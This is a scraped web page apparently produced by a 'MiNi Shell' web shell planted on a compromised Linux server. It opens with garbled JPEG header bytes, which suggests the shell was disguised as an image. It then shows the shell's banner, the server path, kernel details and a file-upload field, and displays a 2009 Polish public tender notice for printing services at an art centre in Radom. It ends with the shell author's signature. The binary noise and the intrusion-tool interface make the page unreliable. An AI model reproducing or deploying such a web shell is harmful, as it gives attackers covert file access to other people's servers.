JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/157536-N-2009.html

<p class="kh_header"><b>Radom: Usługi poligraficzne</b><br>
<b>Numer ogłoszenia: 157536 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowieckie Centrum Sztuki Współczesnej "ELEKTROWNIA" , ul. Kopernika 1, 26-600 Radom, woj. mazowieckie, tel. 048 3836077, faks 048 3836078.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.elektrownia.art.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi poligraficzne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:

1. Katalogi:

1)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format A4, powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4,  format A4, liczba stron: 16
oprawa: broszura szyta. 
nakład: 300 egzemplarzy. 


2)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format A4, powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4,  format A4, liczba stron: 16
oprawa: broszura szyta. 
nakład: 300 egzemplarzy.

3)	Katalog
okładka: papier: kreda matowa 300g, druk 1kolor farba K, 1+0, format A4, powlekana folią matową
środek: papier: kreda matowa 130g, druk 1kolor farba K, 1+1, format A4, liczba stron: 48
oprawa: broszura klejona z grzbietem. 
nakład: 300 egzemplarzy.

4)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format A4, 
powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4, format A4, liczba stron: 48
oprawa: broszura klejona z grzbietem. 
nakład: 300 egzemplarzy.

5)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+4, format 250x250 mm, 
powlekana folią matową + dodatkowo wykrojnik 
środek: papier: kreda matowa 130g, druk CMYK, 4+4, format 250x250 mm, liczba stron: 96
oprawa: twarda z grzbietem. 
nakład: 500 egzemplarzy.

6)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format A4, 
powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4, format A4, liczba stron: 32
oprawa: broszura klejona z grzbietem. 
nakład: 300 egzemplarzy.

7)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format A4, 
powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4, format A4, liczba stron: 32
oprawa: broszura klejona z grzbietem. 
nakład: 500 egzemplarzy.

8)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format B5, 
powlekana folią matową
środek: papier: ofsetowy 100g, druk CMYK, 4+4, format B5, liczba stron: 250
oprawa: twarda z grzbietem. 
nakład: 500 egzemplarzy.

9) Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format B6, 
powlekana folią matową
środek: papier: kreda matowa 130g, druk 1kolor farba K, 1+0, format B6, liczba stron: 160
oprawa: twarda z grzbietem. 
nakład: 300 egzemplarzy.

10) Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+1, format 230x340 mm, 
powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4, format 230x340 mm, liczba stron: 180
oprawa: broszura klejona z grzbietem. 
nakład: 300 egzemplarzy.
	
11) Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format 340x340 mm, powlekana folią matową
środek: papier: kreda matowa 130g, CMYK, 4+4, format 340x340 mm, liczba stron: 96
oprawa: broszura klejona z grzbietem.
nakład 500 egzemplarzy.

12)	Katalog
okładka: papier: kreda matowa 300g, druk CMYK, 4+0, format 245x225 mm, 
powlekana folią matową
środek: papier: kreda matowa 130g, druk CMYK, 4+4, format 245x225 mm, liczba stron: 72
oprawa: twarda grzbiet. 
nakład: 300 egzemplarzy.

13) Katalog
okładka: papier: kreda matowa 300g, druk CMYK, format A4, 4+0, powlekana folią matową
środek: papier: kreda matowa 150g, format A4, 4+4, liczba stron: 48
oprawa: broszurowa klejona z grzbietem
nakład: 300 egzemplarzy.

2. Plakaty:
10 edycji plakatów,
format: 1000x700 mm, druk CMYK, 4+0, papier: kreda błysk 160g,
każda edycja plakatu w nakładzie 300 egzemplarzy.

3. Zaproszenia:
12 edycji zaproszeń,
format: A4 składane do A5, druk CMYK, 4+4, papier: kreda matowa 300g,
każda edycja zaproszenia w nakładzie 300 egzemplarzy.

4. Ulotki:
2 edycje ulotek,
format: A4 składane na 3 części, druk CMYK, 4+4, papier: kreda błysk 160g,
każda edycja ulotek w nakładzie 300 egzemplarzy.

5. Banery:
8 edycji banerów,
format: 4910x2510 mm, druk CMYK na folii banerowej, oczkowany, z poziomymi tunelami,
każda edycja banera w ilości 1 egzemplarza..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-2, 22.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą uczestniczyć Wykonawcy, którzy:
a) spełniają warunki określone w art. 22 ust 1oraz art. 24 ust 1 i 2 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych;
b) złożą ofertę zgodnie z warunkami Specyfikacji Istotnych Warunków Zamówienia;
c) Wykażą, że w okresie ostatnich 3 lat liczonych od daty złożenia oferty (a jeżeli okres ich działalności jest krótszy, to w tym okresie), zrealizowali z należytą starannością, co najmniej (2) dwie usługi odpowiadające swym rodzajem i wartością (minimum 20 tyś złotych) usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania, odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie.
d) W przypadku zamówienia częściowego, dotyczącego plakatów, Wykonawca przedstawi minimum (3) trzy zamówienia odpowiadające wartością, co najmniej 2 tyś złotych 
i spełniające swym zakresem wymogi z SIWZ Dział II, ust. 2.

Wykonawca dołączy do oferty po dwie sztuki próbek reklamowych, w zależności od rodzaju oferty. Zamawiający odeśle próbki Oferentom po wyborze i podpisaniu umowy z wybranym w drodze przetargu Wykonawcą. Brak przedmiotowych próbek będzie powodował przyznanie (0 punktów) 
w kategorii poziom edytorski. Zamawiający zwalnia Wykonawcę z Obowiązku dostarczenia banerów.
KRYTERIA OCENY OFERTY




1.Zamawiający przyjął następującą punktację:
a)cena  	max 40 punktów.
b)poziom edytorski 	max 50 punktów.
c)czas realizacji rodzaju zlecenia jednostkowego	max 10 punktów.


2.Ocena ceny oferty:
W poniższym kryterium Wykonawca może otrzymać maksymalnie 40 punktów.
Oferta zostanie oceniona wg. poniższego wzoru:

a)	liczba punktów w kategorii cena za katalogi, zaproszenia, ulotki, banery wynosi
		32 punkty i będą obliczane według następującego wzoru:

		P(c1) = (Cmin / Cx) x 32 punkty

		gdzie:

P(c1) ) - liczba punktów przyznanych ocenianej ofercie w kategorii cena za katalogi, zaproszenia, ulotki, banery.
Cmin       -	najniższa cena wynikająca ze złożonych ofert,
C x         -	cena oferty badanej.


b)liczba punktów w kategorii cena za plakaty wynosi maksymalnie 8 punktów 
i będzie obliczane według następującego wzoru:

	P(c2) = (Cmin / Cx) x 8 punktów

	gdzie:

P(c2)) - liczba punktów przyznanych ocenianej ofercie w kategorii cena 
za   plakaty.
Cmin       -	najniższa cena wynikająca ze złożonych ofert,
C x         -	cena oferty badanej.



c)Suma punktów uzyskanych we wszystkich kategoriach cena:

P(c1) + P(c2) = P(c)


3.Ocena poziomu edytorskiego załączonych do oferty druków:
W poniższym kryterium Wykonawca może otrzymać maksymalnie 50 punktów.
	Oferta zostanie oceniona wg. poniższego wzoru:

	P(e)   = (Po / P max) x 50 punktów

	gdzie:

	P(e) - liczba punktów przyznanych ocenianej ofercie w kategorii poziom edytorski.
	Po    -  liczba punktów przydzielona ofercie ocenianej.
	Pmax - najwyższa liczba punktów jako została przydzielona spośród ocenianych ofert.


4.Ocena czasu realizacji zamówień jednostkowych w następujących kategoriach:
W poniższym kryterium Wykonawca może otrzymać maksymalnie 10 punktów.
Oferta zostanie oceniona wg. poniższego wzoru:

a)liczba punktów w kategorii czasu realizacji zamówienia jednostkowego dotyczącego katalogów wynosi 2 punkty i będą one obliczane wg. następującego wzoru:

	P(k) = (Cmin / Cx) x 2 punkty
gdzie:
P(k) - liczba punktów przyznanych ocenianej ofercie w kategorii czasu realizacji zamówienia jednostkowego dotyczącego katalogów.
Cmin  -	najniższy czas realizacji wynikający ze złożonych ofert.
C x    -	czasz badanej oferty.


b)liczba punktów w kategorii czasu realizacji zamówienia jednostkowego dotyczącego plakatów wynosi 2 punkty i będą one obliczane wg. następującego wzoru:

P(p) = (Cmin / Cx) x 2 punkty
gdzie:
P(p) - liczba punktów przyznanych ocenianej ofercie w kategorii czasu realizacji zamówienia jednostkowego dotyczącego plakatów.
Cmin  -	najniższy czas realizacji wynikający ze złożonych ofert.
C x    -	czasz badanej oferty.


c)liczba punktów w kategorii czasu realizacji zamówienia jednostkowego dotyczącego zaproszeń wynosi 2 punkty i będą one obliczane wg. następującego wzoru:

P(z) = (Cmin / Cx) x 2 punkty
gdzie:
P(z) - liczba punktów przyznanych ocenianej ofercie w kategorii czasu realizacji zamówienia jednostkowego dotyczącego zaproszeń.
Cmin  -	najniższy czas realizacji wynikający ze złożonych ofert.
C x    -	czasz badanej oferty.


d)liczba punktów w kategorii czasu realizacji zamówienia jednostkowego dotyczącego ulotek wynosi 2 punkty i będą one obliczane wg. następującego wzoru:

P(u) = (Cmin / Cx) x 2 punkty
gdzie:
P(u) - liczba punktów przyznanych ocenianej ofercie w kategorii czasu realizacji zamówienia jednostkowego dotyczącego ulotek.
Cmin  -	najniższy czas realizacji wynikający ze złożonych ofert.
C x    -	czasz badanej oferty.


e)liczba punktów w kategorii czasu realizacji zamówienia jednostkowego dotyczącego banerów wynosi 2 punkty i będą one obliczane wg. następującego wzoru:

P(b) = (Cmin / Cx) x 2 punkty
gdzie:
P(b) - liczba punktów przyznanych ocenianej ofercie w kategorii czasu realizacji zamówienia jednostkowego dotyczącego banerów.
	Cmin  -	najniższy czas realizacji wynikający ze złożonych ofert.
C x    -	czasz badanej oferty.


f)Suma punktów uzyskanych we wszystkich kategoriach czasu realizacji zamówień jednostkowych.
	
	P(k) + P(p) + P(z) + P(u) + P(b) = P(t)


5.	Ostateczna ocena rozpatrywanej oferty:
	
	P(c) + P(e) + P(t) = P

	gdzie:

P - bilans punktów w kategoriach cena, poziom edytorski, czas realizacji zamówień jednostkowych.


6.Liczba punktów będzie zaokrąglona do dwóch miejsc po przecinku..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadcza, że:

1.Spełnia warunki udziału w postępowaniu oraz wypełni postanowienia zawarte w art. 44 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych. 
2.Jest uprawniony do występowania w obrocie prawnym zgodnie z wymogami ustawowymi. 
3.Posiada uprawnienia niezbędne do wykonania określonych czynności objętych zamówieniem, jeżeli przepisy nakładają obowiązek posiadania takich uprawnień.
4.Posiada niezbędną wiedzę i doświadczenie, potencjał ekonomiczny i techniczny, a także pracowników zdolnych do wykonania zamówienia.
5.Znajduje się w sytuacji zapewniającej wykonanie zamówienia.
6.Nie podlega wykluczeniu z postępowania na podstawie Prawa o zamówieniach publicznych art. 24 ust. 1-2 Ustawy z dnia 29 stycznia 2004r.
7.W ofercie nie została zastosowana cena dumpingowa i oferta nie stanowi czynu nieuczciwej konkurencji zgodnie z ustawą z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz.U.2007r. nr.223, poz.1655 ze zm.), i ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów ( Dz. U. 2007 r. nr 50 poz. 331 ze zm.).
8.Jest odpowiedzialny względem Zamawiającego z tytułu wad fizycznych i prawnych wynikłych w toku realizacji przedmiotu zamówienia
9.Wyraża zgodę na udostępnienie i przetwarzanie swoich danych osobowych dla potrzeb Zamawiającego.

Dokument stwierdzający status prawny oferenta	Załącznik nr 5
	Aktualny odpis z właściwego rejestru o zarejestrowaniu firmy, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej. Dokumenty te mają posiadać date aktualnego odpisu, lub kserokopii nie starszą niż 6 miesięcy od daty złożenia oferty. Kserokopie mają być poświadczone za zgodność z oryginałem.

Dokument potwierdzający prawo do reprezentowania Wykonawcy 	Załącznik nr 6.

Wzór Formularza zamówienia jednostkowego	Załącznik nr 7
- przedstawiony przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - poziom edytorski - 50</li>
<li>3 - czas realizacji rodzaju zlecenia jednostkowego - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.elektrownia.art.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 26-600 Radom ul. Kopernika 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 12:00, miejsce: siedziba Zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com